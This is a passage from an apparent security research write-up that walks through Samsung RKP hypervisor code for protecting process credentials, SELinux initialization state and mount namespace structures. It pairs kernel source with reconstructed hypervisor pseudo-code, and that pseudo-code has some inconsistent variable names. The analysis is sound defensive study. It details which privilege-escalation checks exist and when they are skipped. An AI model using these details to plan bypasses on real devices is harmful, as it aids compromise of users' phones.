u64 use_cnt;
};
}cred_param_t;
enum {
RKP_CMD_COPY_CREDS = 0,
RKP_CMD_CMMIT_CREDS,
RKP_CMD_OVRD_CREDS,
};
#define override_creds(x) rkp_override_creds(&x)
#define rkp_cred_fill_params(crd,crd_ro,uptr,tsec,rkp_cmd_type,rkp_use_cnt) \
do { \
cred_param.cred = crd; \
cred_param.cred_ro = crd_ro; \
cred_param.use_cnt_ptr = uptr; \
cred_param.sec_ptr= tsec; \
cred_param.type = rkp_cmd_type; \
cred_param.use_cnt = (u64)rkp_use_cnt; \
} while(0)
// from kernel/cred.c
static struct cred *prepare_ro_creds(struct cred *old, int kdp_cmd, u64 p)
{
u64 pgd =(u64)(current->mm?current->mm->pgd:swapper_pg_dir);
struct cred *new_ro;
void *use_cnt_ptr = NULL;
void *rcu_ptr = NULL;
void *tsec = NULL;
cred_param_t cred_param;
new_ro = kmem_cache_alloc(cred_jar_ro, GFP_KERNEL);
if (!new_ro)
panic("[%d] : kmem_cache_alloc() failed", kdp_cmd);
use_cnt_ptr = kmem_cache_alloc(usecnt_jar,GFP_KERNEL);
if (!use_cnt_ptr)
panic("[%d] : Unable to allocate usage pointer\n", kdp_cmd);
rcu_ptr = get_usecnt_rcu(use_cnt_ptr);
((struct ro_rcu_head*)rcu_ptr)->bp_cred = (void *)new_ro;
tsec = kmem_cache_alloc(tsec_jar, GFP_KERNEL);
if (!tsec)
panic("[%d] : Unable to allocate security pointer\n", kdp_cmd);
rkp_cred_fill_params(old,new_ro,use_cnt_ptr,tsec,kdp_cmd,p);
uh_call(UH_APP_RKP, RKP_KDP_X46, (u64)&cred_param, 0, 0, 0);
if (kdp_cmd == RKP_CMD_COPY_CREDS) {
if ((new_ro->bp_task != (void *)p)
|| new_ro->security != tsec
|| new_ro->use_cnt != use_cnt_ptr) {
panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#", kdp_cmd, new_ro->bp_task,(void *)p,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr);
}
}
else {
if ((new_ro->bp_task != current)||
(current->mm
&& new_ro->bp_pgd != (void *)pgd) ||
(new_ro->security != tsec) ||
(new_ro->use_cnt != use_cnt_ptr)) {
panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#, pgd=#%p:%p#", kdp_cmd, new_ro->bp_task,current,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr,new_ro->bp_pgd,(void *)pgd);
}
}
rocred_uc_set(new_ro, 2);
set_cred_subscribers(new_ro, 0);
get_group_info(new_ro->group_info);
get_uid(new_ro->user);
get_user_ns(new_ro->user_ns);
#ifdef CONFIG_KEYS
key_get(new_ro->session_keyring);
key_get(new_ro->process_keyring);
key_get(new_ro->thread_keyring);
key_get(new_ro->request_key_auth);
#endif
validate_creds(new_ro);
return new_ro;
}
int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
// ...
/*
* Disabling cred sharing among the same thread group. This
* is needed because we only added one back pointer in cred.
*
* This should NOT in any way change kernel logic, if we think about what
* happens when a thread needs to change its credentials: it will just
* create a new one, while all other threads in the same thread group still
* reference the old one, whose reference counter decreases by 2.
*/
if(!rkp_cred_enable){
// ...
}
// ...
if(rkp_cred_enable){
p->cred = p->real_cred = prepare_ro_creds(new, RKP_CMD_COPY_CREDS, (u64)p);
put_cred(new);
}
else {
p->cred = p->real_cred = get_cred(new);
alter_cred_subscribers(new, 2);
validate_creds(new);
}
// ...
}
int commit_creds(struct cred *new)
{
if (rkp_ro_page((unsigned long)new))
BUG_ON((rocred_uc_read(new)) < 1);
else
// ...
if(rkp_cred_enable) {
struct cred *new_ro;
new_ro = prepare_ro_creds(new, RKP_CMD_CMMIT_CREDS, 0);
rcu_assign_pointer(task->real_cred, new_ro);
rcu_assign_pointer(task->cred, new_ro);
}
else {
rcu_assign_pointer(task->real_cred, new);
rcu_assign_pointer(task->cred, new);
}
// ...
if (rkp_cred_enable){
put_cred(new);
put_cred(new);
}
// ...
}
const struct cred *rkp_override_creds(struct cred **cnew)
{
// ...
struct cred *new = *cnew;
// ...
if(rkp_cred_enable) {
volatile unsigned int rkp_use_count = rkp_get_usecount(new);
struct cred *new_ro;
new_ro = prepare_ro_creds(new, RKP_CMD_OVRD_CREDS, rkp_use_count);
*cnew = new_ro;
rcu_assign_pointer(current->cred, new_ro);
put_cred(new);
}
else {
get_cred(new);
alter_cred_subscribers(new, 1);
rcu_assign_pointer(current->cred, new);
}
// ...
}
On the hypervisor side, rkp_cmd_assign_creds
calls rkp_assign_creds
.
int64_t rkp_cmd_assign_creds(saved_regs_t* regs) {
rkp_assign_creds(regs);
return 0;
}
uint64_t rkp_ns_get_current() {
if (get_sp_sel())
return get_sp_el0();
return get_sp();
}
int64_t check_pe_id(uint32_t targ_id, uint32_t curr_id) {
return curr_id > 1000 && targ_id <= 1000;
}
bool rkp_check_pe(int64_t targ_cred, int64_t curr_cred) {
// ..
curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
targ_uid = *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET);
if (check_pe_id(targ_uid, curr_uid))
return 1;
curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
targ_gid = *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET);
if (check_pe_id(targ_gid, curr_gid))
return 1;
curr_ueid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
targ_euid = *(targ_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
if (targ_euid < curr_uid && check_pe_id(targ_euid, curr_euid))
return 1;
curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
targ_egid = *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
if (targ_egid < curr_gid && check_pe_id(targ_egid, curr_egid))
return 1;
return 0;
}
int64_t from_zyg_adbd(int64_t curr_task, int64_t curr_cred) {
// ...
curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
if ((curr_flags & 2) != 0)
return 1;
task = curr_task;
while (1) {
task_pid = *(task + 4 * rkp_cred->TASK_PID_OFFSET);
if (!task_pid)
return 0;
task_comm = task + 8 * rkp_cred->TASK_COMM_OFFSET;
memcpy(comm, task_comm, sizeof(comm));
if (!strcmp(comm, "zygote") || !strcmp(comm, "zygote64") || !strcmp(comm, "adbd"))
return 1;
parent_va = *(task + 8 * rkp_cred->TASK_PARENT_OFFSET);
task = parent_pa = rkp_get_pa(parent_va);
}
}
int64_t rkp_privilege_escalation(int64_t targ_cred, int64_t curr_cred, int64_t flag) {
uh_log('L', "rkp_kdp.c", 461, "Priv Escalation - Current %lx %lx %lx", *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET),
*(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
uh_log('L', "rkp_kdp.c", 462, "Priv Escalation - Passed %lx %lx %lx", *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET),
*(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
return rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", targ_cred, curr_cred, flag);
}
bool check_privilege_escalation(int32_t targ_id, int32_t curr_id) {
return ((curr_id - 0x61A80000) <= 0xFFFF && (targ_id - 0x61A80000) > 0xFFFF && targ_id != -1);
}
int64_t chk_invalid_sec_ptr(uint64_t sec_ptr) {
rkp_phys_map_lock(sec_ptr);
if (!sec_ptr || !is_phys_map_sec_ptr(sec_ptr) || !is_phys_map_sec_ptr(sec_ptr + rkp_cred->SP_SIZE - 1) ||
sec_ptr != sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE) {
uh_log('L', "rkp_kdp.c", 186, "Invalid Sec Pointer %lx %lx %lx", is_phys_map_sec_ptr(sec_ptr), sec_ptr,
sec_ptr - sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE);
rkp_phys_map_unlock(sec_ptr);
return 1;
}
rkp_phys_map_unlock(sec_ptr);
return 0;
}
void rkp_assign_creds(saved_regs_t* regs) {
// ...
cred_param = rkp_get_pa(regs->x2);
if (!cred_param) {
uh_log('L', "rkp_kdp.c", 662, "NULL pData");
return;
}
curr_task_va = rkp_ns_get_current();
curr_task = rkp_get_pa(curr_task_va);
curr_cred_va = *(curr_task + 8 * rkp_cred->TASK_CRED_OFFSET);
curr_cred = rkp_get_pa(curr_cred_va);
targ_cred = rkp_get_pa(cred_param->cred);
targ_cred_ro = rkp_get_pa(cred_param->cred_ro);
curr_secptr_va = *(curr_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
curr_secptr = rkp_get_pa(curr_secptr_va);
if (!curr_cred) {
uh_log('L', "rkp_kdp.c", 489, "\nCurrent Cred is NULL %lx %lx %lx\n ", curr_task, curr_task_va, 0);
return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_task, 0);
}
if (!curr_secptr && rkp_deferred_inited) {
uh_log('L', "rkp_kdp.c", 495, "\nCurrent sec_ptr is NULL %lx %lx %lx\n ", curr_task, curr_task_va, curr_cred);
return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_cred, 0);
}
bp_cred_va = *(curr_secptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET);
bp_task_va = *(curr_cred + 8 * rkp_cred->CRED_BP_TASK_OFFSET);
if (bp_cred_va != curr_cred_va || bp_task_va != curr_task_va) {
uh_log('L', "rkp_kdp.c", 502, "\n Integrity Check failed_1 %lx %lx %lx\n ", bp_cred_va, curr_cred_va, curr_cred);
uh_log('L', "rkp_kdp.c", 503, "\n Integrity Check failed_2 %lx %lx %lx\n ", bp_task_va, curr_task_va, curr_task);
rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", bp_cred_va, curr_cred_va, curr_secptr);
return;
}
if (!targ_cred || !targ_cred_ro || rkp_phys_map_verify_cred(targ_cred_ro)) {
uh_log('L', "rkp_kdp.c", 699, "rkp_assign_creds !! %lx %lx", targ_cred_ro, targ_cred);
return;
}
skip_checks = 0;
curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
if ((curr_flags & 8) == 0) {
curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
if ((curr_uid & 0xFFFF0000) != 0x61A80000 && (curr_euid & 0xFFFF0000) != 0x61A80000 &&
(curr_gid & 0xFFFF0000) != 0x61A80000 && (curr_egid & 0xFFFF0000) != 0x61A80000) {
if (!rkp_cred->VERIFIED_BOOT_STATE) {
if (rkp_check_pe(targ_cred, curr_cred) && from_zyg_adbd(curr_task, curr_cred)) {
uh_log('L', "rkp_kdp.c", 717, "Priv Escalation! %lx %lx %lx", targ_cred,
*(targ_cred + 8 * rkp_cred->CRED_EUID_OFFSET), *(curr_cred + 8 * rkp_cred->CRED_EUID_OFFSET));
return rkp_privilege_escalation(targ_cred, cred_pa, 1);
}
}
skip_checks = 1;
} else {
*(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) = curr_flags | CRED_FLAG_LOD;
}
}
if (!skip_checks) {
targ_uid = *(targ_cred + rkp_cred->CRED_UID_OFFSET);
priv_esc = 0;
if (targ_uid != 3003) {
curr_uid = *(cred_pa + 4 * rkp_cred->CRED_UID_OFFSET);
priv_esc = 0;
if (check_privilege_escalation(targ_uid, curr_uid)) {
uh_log('L', "rkp_kdp.c", 382, "\n LOD: uid privilege escalation curr_uid = %ld targ_uid = %ld \n", curr_uid,
targ_uid);
priv_esc = 1;
}
}
targ_euid = *(targ_cred + rkp_cred->CRED_EUID_OFFSET);
if (targ_euid != 3003) {
curr_euid = *(cred_pa + 4 * rkp_cred->CRED_EUID_OFFSET);
if (check_privilege_escalation(targ_euid, curr_euid)) {
uh_log('L', "rkp_kdp.c", 387, "\n LOD: euid privilege escalation curr_euid = %ld targ_euid = %ld \n", curr_euid,
targ_euid);
priv_esc = 1;
}
}
targ_gid = *(targ_cred + rkp_cred->CRED_GID_OFFSET);
if (targ_gid != 3003) {
curr_gid = *(cred_pa + 4 * rkp_cred->CRED_GID_OFFSET);
if (check_privilege_escalation(targ_gid, curr_gid)) {
uh_log('L', "rkp_kdp.c", 392, "\n LOD: Gid privilege escalation curr_gid = %ld targ_gid = %ld \n", curr_gid,
targ_gid);
priv_esc = 1;
}
}
targ_egid = *(targ_cred + rkp_cred->CRED_EGID_OFFSET);
if (targ_egid != 3003) {
curr_egid = *(cred_pa + 4 * rkp_cred->CRED_EGID_OFFSET);
if (check_privilege_escalation(targ_egid, curr_egid)) {
uh_log('L', "rkp_kdp.c", 397, "\n LOD: egid privilege escalation curr_egid = %ld targ_egid = %ld \n", curr_egid,
targ_egid);
priv_esc = 1;
}
}
if (priv_esc) {
uh_log('L', "rkp_kdp.c", 705, "Linux on Dex Priv Escalation! %lx ", targ_cred);
if (curr_task) {
curr_comm = curr_task + 8 * rkp_cred->TASK_COMM_OFFSET;
uh_log('L', "rkp_kdp.c", 707, curr_comm);
}
return rkp_privilege_escalation(param_cred_pa, cred_pa, 1);
}
}
memcpy(targ_cred_ro, targ_cred, rkp_cred->CRED_SIZE);
cmd_type = cred_param->type;
*(targ_cred_ro + 8 * rkp_cred->CRED_USE_CNT) = cred_param->use_cnt_ptr;
if (cmd_type != RKP_CMD_COPY_CREDS) {
curr_mm_va = *(current_pa + 8 * rkp_cred->TASK_MM_OFFSET);
if (curr_mm_va) {
curr_mm = rkp_get_pa(curr_mm_va);
curr_pgd_va = *(curr_mm + 8 * rkp_cred->MM_PGD_OFFSET);
} else {
curr_pgd_va = rkp_get_va(get_ttbr1_el1() & 0xFFFFFFFFC000);
}
*(targ_cred_ro + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = curr_pgd_va;
*(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = curr_task_va;
if (cmd_type == RKP_CMD_OVRD_CREDS) {
if (cred_param->use_cnt <= 1)
*(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_ORPHAN;
else
*(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_ORPHAN;
}
} else {
*(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = cred_param->task_ptr;
}
sec_ptr_va = cred_param->sec_ptr;
cred_ro_va = cred_param->cred_ro;
if (sec_ptr_va) {
sec_ptr = rkp_get_pa(sec_ptr_va);
targ_secptr_va = *(targ_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
targ_secptr = rkp_get_pa(targ_secptr);
if (chk_invalid_sec_ptr(sec_ptr) || !targ_secptr || !curr_secptr) {
uh_log('L', "rkp_kdp.c", 594, "Invalid sec pointer [assign_secptr] %lx %lx %lx", sec_ptr_va, sec_ptr,
targ_secptr);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", sec_ptr_va, targ_secptr, curr_secptr);
} else {
curr_sid = *(curr_secptr + 4);
targ_sid = *(targ_secptr + 4);
if (rkp_deferred_inited && targ_sid <= 19 && curr_sid >= 21) {
uh_log('L', "rkp_kdp.c", 607, "Selinux Priv Escalation !! [assign_secptr] %lx %lx ", targ_sid, curr_sid);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", targ_sid, curr_sid, 0);
} else {
memcpy(sec_ptr, targ_secptr, rkp_cred->SP_SIZE);
*(targ_cred_ro + 8 * rkp_cred->CRED_SECURITY_OFFSET) = sec_ptr_va;
*(sec_ptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET) = cred_ro_va;
}
}
} else {
uh_log('L', "rkp_kdp.c", 583, "Security Pointer is NULL [assign_secptr] %lx", 0);
rkp_policy_violation("Data Protection Violation", 0, 0, 0);
}
if (rkp_cred->VERIFIED_BOOT_STATE)
return;
targ_flags = *(targ_cred_ro + 8 * rkp_creds->CRED_FLAGS_OFFSET);
if ((targ_flags & CRED_FLAG_MARK_PPT) != 0) {
parent_task_va = *(curr_task + 8 * rkp_cred->TASK_PARENT_OFFSET);
parent_task = rkp_get_pa(parent_task_va);
parent_cred_va = *(parent_task + 8 * rkp_cred->TASK_CRED_OFFSET);
parent_cred = rkp_get_pa(parent_cred_va);
parent_flags = *(parent_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
if ((parent_flags & CRED_FLAG_MARK_PPT) != 0)
*(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_CHILD_PPT;
}
}
rkp_assign_creds
does the following:
task_struct
by getting SP_EL0
;current
;arch/arm64/include/asm/current.h
).struct task_struct
is correct;struct task_security_struct
is correct;struct cred
is marked as CRED
in the physmap;struct cred
doesn't have any flags set;CRED_FLAG_LOD
(8).VERIFIED_BOOT_STATE
is 0 (device unlocked), it skips the next checks;rkp_check_pe
and from_zyg_adbd
;rkp_check_pe
(check privilege escalation) checks if the current ID is > AID_SYSTEM
and the target ID is <= AID_SYSTEM
. It checks the UID, GID, EUID and EGID;from_zyg_adbd
returns if the current task is flagged, or if it has a parent that is either zygote
, zygote64
or adbd
(meaning it is a child of these tasks);rkp_privilege_escalation
to trigger a violation;check_privilege_escalation
;rkp_privilege_escalation
.struct cred
into the RO one;use_cnt
field of the RO struct cred
to the value given as argument;RKP_CMD_COPY_CREDS
(e.g. called from copy_creds
):struct cred
to the struct task_struct
.RKP_CMD_CMMIT_CREDS
(called from commit_creds
) or RKP_CMD_OVRD_CREDS
(called from override_creds
):struct mm_struct
of the current struct task_struct
;TTBR1_EL1
;struct cred
;struct cred
to the current task;RKP_CMD_OVRD_CREDS
:CRED_FLAG_ORPHAN
(1);CRED_FLAG_ORPHAN
(1).chk_invalid_sec_ptr
on the struct task_security_struct
given as argument;SEC_PTR
in the physmap;SP_BUFF_SIZE
).SECINITSID_SYSCTL_NET_UNIX
and the target SID <= SECINITSID_SYSCTL_KERNEL
, then this is privilege escalation;SECINITSID_xxx
are defined in security/selinux/include/flask.h
).struct task_security_struct
into the RO one;security
field of the RO struct cred
to the RO one;bp_cred
field of the RO struct task_security_struct
to the RO one;CRED_FLAG_MARK_PPT
:CRED_FLAG_MARK_PPT
:CRED_FLAG_CHILD_PPT
.RKP also protects the ss_initialized
global variable that is used by the kernel to indicate if SELinux has been initialized (if a policy has been loaded). The kernel calls RKP in security_load_policy
to set it to 1. This has likely been added because if it has been used to disable SELinux in a previous RKP bypass.
int security_load_policy(void *data, size_t len)
{
// ...
uh_call(UH_APP_RKP, RKP_KDP_X60, (u64)&ss_initialized, 1, 0, 0);
// ...
}
On the hypervisor side, rkp_cmd_selinux_initialized
calls rkp_selinux_initialized
.
int64_t rkp_cmd_selinux_initialized(saved_regs_t* regs) {
rkp_selinux_initialized(regs);
return 0;
}
void rkp_selinux_initialized(saved_regs_t* regs) {
// ...
ss_initialized_va = regs->x2;
value = regs->x3;
ss_initialized = rkp_get_pa(ss_initialized_va);
if (ss_initialized) {
if (ss_initialized_va < SRODATA || ss_initialized_va > ERODATA) {
rkp_policy_violation("RKP_ba9b5794 %lxRKP_69d2a377%lx, %lxRKP_ba5ec51d", ss_initialized_va);
} else if (ss_initialized == rkp_cred->SS_INITIALIZED_VA) {
if (value == 1) {
*ss_initialized = value;
uh_log('L', "rkp_kdp.c", 1199, "RKP_3a152688 %d", 1);
} else {
rkp_policy_violation("RKP_3ba4a93d");
}
} else if (ss_initialized == rkp_cred->SELINUX) {
if (value == 1 || *ss_initialized != 1) {
*ss_initialized = value;
uh_log('L', "rkp_kdp.c", 1212, "RKP_8df36e46 %d", value);
} else {
rkp_policy_violation("RKP_cef38ae5");
}
} else {
rkp_policy_violation("RKP_ced87e02");
}
} else {
uh_log('L', "rkp_kdp.c", 1181, "RKP_0a7ac3b1\n");
}
}
rkp_selinux_initialized
does the following:
ss_initialized
is location in the .rodata
section;Similarly to the credentials, the struct vfsmount
are allocated in read-only pages. And this structure also gets a new field for storing the back pointer to the struct mount
that owns it.
// from include/linux/mount.h
struct vfsmount {
// ...
struct mount *bp_mount; /* pointer to mount*/
// ...
} __randomize_layout;
This value also gets verified on each SELinux hooks via the call to security_integrity_current
.
// from fs/namespace.c
extern u8 ns_prot;
unsigned int cmp_ns_integrity(void)
{
struct mount *root = NULL;
struct nsproxy *nsp = NULL;
int ret = 0;
if((in_interrupt()
|| in_softirq())){
return 0;
}
nsp = current->nsproxy;
if(!ns_prot || !nsp ||
!nsp->mnt_ns) {
return 0;
}
root = current->nsproxy->mnt_ns->root;
if(root != root->mnt->bp_mount){
printk("\n RKP44_3 Name Space Mismatch %p != %p\n nsp = %p mnt_ns %p\n",root,root->mnt->bp_mount,nsp,nsp->mnt_ns);
ret = 1;
}
return ret;
}
// from security/selinux/hooks.c
int security_integrity_current(void)
{
// ...
if ( rkp_cred_enable &&
// ...
cmp_ns_integrity())) {
// ...
}
// ...
}
We can see that cmp_ns_integrity
checks if the back pointer is valid.
When the kernel allocates a new mount namespace in alloc_vfsmnt
of fs/namespace.c
, it makes a call RKP to RKP to initialize the back pointer of the struct vfsmount
.
// from fs/namespace.c
void rkp_init_ns(struct vfsmount *vfsmnt,struct mount *mnt)
{
uh_call(UH_APP_RKP, RKP_KDP_X52, (u64)vfsmnt, (u64)mnt, 0, 0);
}
static int mnt_alloc_vfsmount(struct mount *mnt)
{
struct vfsmount *vfsmnt = NULL;
vfsmnt = kmem_cache_alloc(vfsmnt_cache, GFP_KERNEL);
if(!vfsmnt)
return 1;
spin_lock(&mnt_vfsmnt_lock);
rkp_init_ns(vfsmnt,mnt);
// vfsmnt->bp_mount = mnt;
mnt->mnt = vfsmnt;
spin_unlock(&mnt_vfsmnt_lock);
return 0;
}
static struct mount *alloc_vfsmnt(const char *name)
{
// ...
err = mnt_alloc_vfsmount(mnt);
if (err)
goto out_free_cache;
// ...
}
On the hypervisor side, rkp_cmd_init_ns
calls rkp_init_ns
.
int64_t rkp_cmd_init_ns(saved_regs_t* regs) {
rkp_init_ns(regs);
return 0;
}
int64_t chk_invalid_ns(uint64_t vfsmnt) {
if (!vfsmnt || vfsmnt != vfsmnt / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE)
return 1;
rkp_phys_map_lock(vfsmnt);
if (!is_phys_map_ns(vfsmnt)) {
uh_log('L', "rkp_kdp.c", 882, "Name space physmap verification failed !!!!! %lx", vfsmnt);
rkp_phys_map_unlock(vfsmnt);
return 1;
}
rkp_phys_map_unlock(vfsmnt);
return 0;
}
void rkp_init_ns(saved_regs_t* regs) {
// ...
vfsmnt = rkp_get_pa(regs->x2);
if (!chk_invalid_ns(vfsmnt)) {
memset(vfsmnt, 0, rkp_cred->NS_SIZE);
*(vfsmnt + 8 * rkp_cred->BPMNT_VFSMNT_OFFSET) = regs->x3;
}
}
rkp_init_ns
calls chk_invalid_ns
to check if the struct vfsmount
is marked as NS
in the physmap and matches the expected size. If it does, it memsets it and sets the back pointer to the owning struct mount
.
To set fields of the struct vfsmount
, once again the kernel calls RKP.
It does with the following kernel and hypervisor functions:
Field | Kernel Function | Hypervisor Function |
---|---|---|
mnt_sb |
rkp_set_mnt_root_sb |
rkp_cmd_ns_set_root_sb |
mnt_flags |
rkp_assign_mnt_flags |
rkp_cmd_ns_set_flags |
data |
rkp_set_data |
rkp_cmd_ns_set_data |
On the kernel side, the functions are:
// from fs/namespace.c
void rkp_set_mnt_root_sb(struct vfsmount *mnt, struct dentry *mnt_root,struct super_block *mnt_sb)
{
uh_call(UH_APP_RKP, RKP_KDP_X53, (u64)mnt, (u64)mnt_root, (u64)mnt_sb, 0);
}
void rkp_assign_mnt_flags(struct vfsmount *mnt,int flags)
{
uh_call(UH_APP_RKP, RKP_KDP_X54, (u64)mnt, (u64)flags, 0, 0);
}
void rkp_set_data(struct vfsmount *mnt,void *data)
{
uh_call(UH_APP_RKP, RKP_KDP_X55, (u64)mnt, (u64)data, 0, 0);
}
void rkp_set_mnt_flags(struct vfsmount *mnt,int flags)
{
int f = mnt->mnt_flags;
f |= flags;
rkp_assign_mnt_flags(mnt,f);
}
void rkp_reset_mnt_flags(struct vfsmount *mnt,int flags)
{
int f = mnt->mnt_flags;
f &= ~flags;
rkp_assign_mnt_flags(mnt,f);
}
On the hypervisor side, the functions are:
int64_t rkp_cmd_ns_set_root_sb(saved_regs_t* regs) {
rkp_ns_set_root_sb(regs);
return 0;
}
void rkp_ns_set_root_sb(saved_regs_t* regs) {
// ...
vfsmnt = rkp_get_pa(regs->x2);
if (!chk_invalid_ns(vfsmnt)) {
*vfsmnt = regs->x3;
*(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET) = regs->x4;
}
}
int64_t rkp_cmd_ns_set_flags(saved_regs_t* regs) {
rkp_ns_set_flags(regs);
return 0;
}
void rkp_ns_set_flags(saved_regs_t* regs) {
// ...
vfsmnt = rkp_get_pa(regs->x2);
if (!chk_invalid_ns(vfsmnt))
*(vfsmnt + 4 * rkp_cred->FLAGS_VFSMNT_OFFSET) = regs->x3;
}
int64_t rkp_cmd_ns_set_data(saved_regs_t* regs) {
rkp_ns_set_data(regs);
return 0;
}
void rkp_ns_set_data(saved_regs_t* regs) {
// ...
vfsmnt = rkp_get_pa(regs->x2);
if (!chk_invalid_ns(vfsmnt))
*(vfsmnt + 8 * rkp_cred->DATA_VFSMNT_OFFSET) = regs->x3;
}
Each of the functions call chk_invalid_ns
to check if the structure is valid, before setting its field.
The last command is called when a new mount point is being created.
// from fs/namespace.c
#define KDP_MOUNT_ROOTFS "/root" //system-as-root
#define KDP_MOUNT_ROOTFS_LEN strlen(KDP_MOUNT_ROOTFS)
#define KDP_MOUNT_PRODUCT "/product"
#define KDP_MOUNT_PRODUCT_LEN strlen(KDP_MOUNT_PRODUCT)
#define KDP_MOUNT_SYSTEM "/system"
#define KDP_MOUNT_SYSTEM_LEN strlen(KDP_MOUNT_SYSTEM)
#define KDP_MOUNT_VENDOR "/vendor"
#define KDP_MOUNT_VENDOR_LEN strlen(KDP_MOUNT_VENDOR)
#define KDP_MOUNT_ART "/apex/com.android.runtime"
#define KDP_MOUNT_ART_LEN strlen(KDP_MOUNT_ART)
#define KDP_MOUNT_ART2 "/com.android.runtime@1"
#define KDP_MOUNT_ART2_LEN strlen(KDP_MOUNT_ART2)
#define ART_ALLOW 2
enum kdp_sb {
KDP_SB_ROOTFS = 0,
KDP_SB_ODM,
KDP_SB_SYS,
KDP_SB_VENDOR,
KDP_SB_ART,
KDP_SB_MAX
};
int art_count = 0;
static void rkp_populate_sb(char *mount_point, struct vfsmount *mnt)
{
if (!mount_point || !mnt)
return;
if (!odm_sb &&
!strncmp(mount_point, KDP_MOUNT_PRODUCT, KDP_MOUNT_PRODUCT_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&odm_sb, (u64)mnt, KDP_SB_ODM, 0);
} else if (!rootfs_sb &&
!strncmp(mount_point, KDP_MOUNT_ROOTFS, KDP_MOUNT_ROOTFS_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&rootfs_sb, (u64)mnt, KDP_SB_SYS, 0);
} else if (!sys_sb &&
!strncmp(mount_point, KDP_MOUNT_SYSTEM, KDP_MOUNT_SYSTEM_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&sys_sb, (u64)mnt, KDP_SB_SYS, 0);
} else if (!vendor_sb &&
!strncmp(mount_point, KDP_MOUNT_VENDOR, KDP_MOUNT_VENDOR_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&vendor_sb, (u64)mnt, KDP_SB_VENDOR, 0);
} else if (!art_sb &&
!strncmp(mount_point, KDP_MOUNT_ART, KDP_MOUNT_ART_LEN - 1)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
} else if ((art_count < ART_ALLOW) &&
!strncmp(mount_point, KDP_MOUNT_ART2, KDP_MOUNT_ART2_LEN - 1)) {
if (art_count)
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
art_count++;
}
}
static int do_new_mount(struct path *path, const char *fstype, int sb_flags,
int mnt_flags, const char *name, void *data)
{
// ...
buf = kzalloc(PATH_MAX, GFP_KERNEL);
if (!buf){
kfree(buf);
return -ENOMEM;
}
dir_name = dentry_path_raw(path->dentry, buf, PATH_MAX);
if(!sys_sb || !odm_sb || !vendor_sb || !rootfs_sb || !art_sb || (art_count < ART_ALLOW))
rkp_populate_sb(dir_name,mnt);
kfree(buf);
// ...
}
do_mount
calls do_new_mount
which calls rkp_populate_sb
. This function checks the path the mount point against specific paths, and then calls RKP.
The predefined paths are:
/root
/product
/system
/vendor
/apex/com.android.runtime
/com.android.runtime@1
On the hypervisor side, rkp_cmd_ns_set_sys_vfsmnt
calls rkp_ns_set_sys_vfsmnt
.
int64_t rkp_cmd_ns_set_sys_vfsmnt(saved_regs_t* regs) {
rkp_ns_set_sys_vfsmnt(regs);
return 0;
}
void* rkp_ns_set_sys_vfsmnt(saved_regs_t* regs) {
// ...
if (!rkp_cred) {
uh_log('W', "rkp_kdp.c", 931, "RKP_ae6cae81");
return;
}
art_sb = rkp_get_pa(regs->x2);
vfsmnt = rkp_get_pa(regs->x3);
mount_point = regs->x4;
